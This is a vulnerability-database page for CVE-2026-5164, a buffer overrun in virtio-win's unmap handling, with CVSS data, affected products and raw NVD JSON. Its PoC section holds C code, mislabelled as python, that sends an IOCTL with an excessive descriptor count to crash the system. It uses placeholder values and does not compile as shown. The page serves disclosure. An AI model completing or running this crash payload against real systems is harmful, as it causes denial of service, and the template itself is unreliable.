Security Vulnerability Report
中文
CVE-2026-5164 CVSS 6.7 MEDIUM

CVE-2026-5164

Published: 2026-03-30 15:16:36
Last Modified: 2026-04-28 14:22:24
Source: [email protected]

Description

A flaw was found in virtio-win. The `RhelDoUnMap()` function does not properly validate the number of descriptors provided by a user during an unmap request. A local user could exploit this input validation vulnerability by supplying an excessive number of descriptors, leading to a buffer overrun. This can cause a system crash, resulting in a Denial of Service (DoS).

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:redhat:virtio-win:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:* - VULNERABLE
virtio-win (修复前的特定版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2026-5164 // This code demonstrates triggering the buffer overrun in virtio-win by sending // an unmap request with an excessive number of descriptors. // Note: Requires local high privileges and specific driver environment. #include <windows.h> #include <stdio.h> int main() { HANDLE hDevice; DWORD bytesReturned; // Placeholder for actual device path char devicePath[] = "\\\\.\\VirtIODevice"; // Placeholder for actual UnMap IOCTL code DWORD ioctlCode = 0xXXXX; // Open a handle to the vulnerable driver hDevice = CreateFileA(devicePath, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("Failed to open device. Error: %d\n", GetLastError()); return 1; } // Structure representing the unmap payload typedef struct _UNMAP_PAYLOAD { ULONG DescriptorCount; PVOID Descriptors; } UNMAP_PAYLOAD; UNMAP_PAYLOAD payload; // Set an abnormally high number to trigger the overflow payload.DescriptorCount = 0xFFFFFFFF; payload.Descriptors = NULL; printf("Sending malicious payload to trigger buffer overrun...\n"); // Send the IOCTL request BOOL result = DeviceIoControl( hDevice, ioctlCode, &payload, sizeof(payload), NULL, 0, &bytesReturned, NULL ); if (!result) { printf("DeviceIoControl failed. Error: %d\n", GetLastError()); } else { printf("Payload sent successfully. System may crash.\n"); } CloseHandle(hDevice); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5164", "sourceIdentifier": "[email protected]", "published": "2026-03-30T15:16:36.180", "lastModified": "2026-04-28T14:22:23.607", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in virtio-win. The `RhelDoUnMap()` function does not properly validate the number of descriptors provided by a user during an unmap request. A local user could exploit this input validation vulnerability by supplying an excessive number of descriptors, leading to a buffer overrun. This can cause a system crash, resulting in a Denial of Service (DoS)."}, {"lang": "es", "value": "Se encontró una falla en virtio-win. La función 'RhelDoUnMap()' no valida correctamente el número de descriptores proporcionados por un usuario durante una solicitud de desmapeo. Un usuario local podría explotar esta vulnerabilidad de validación de entrada al proporcionar un número excesivo de descriptores, lo que lleva a un desbordamiento de búfer. Esto puede causar una caída del sistema, resultando en una denegación de servicio (DoS)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:virtio-win:-:*:*:*:*:*:*:*", "matchCriteriaId": "3C9702E9-461D-4BEC-9AD4-EE6C8D5E3327"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-5164", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453014", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/virtio-win/kvm-guest-drivers-windows/pull/1504", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.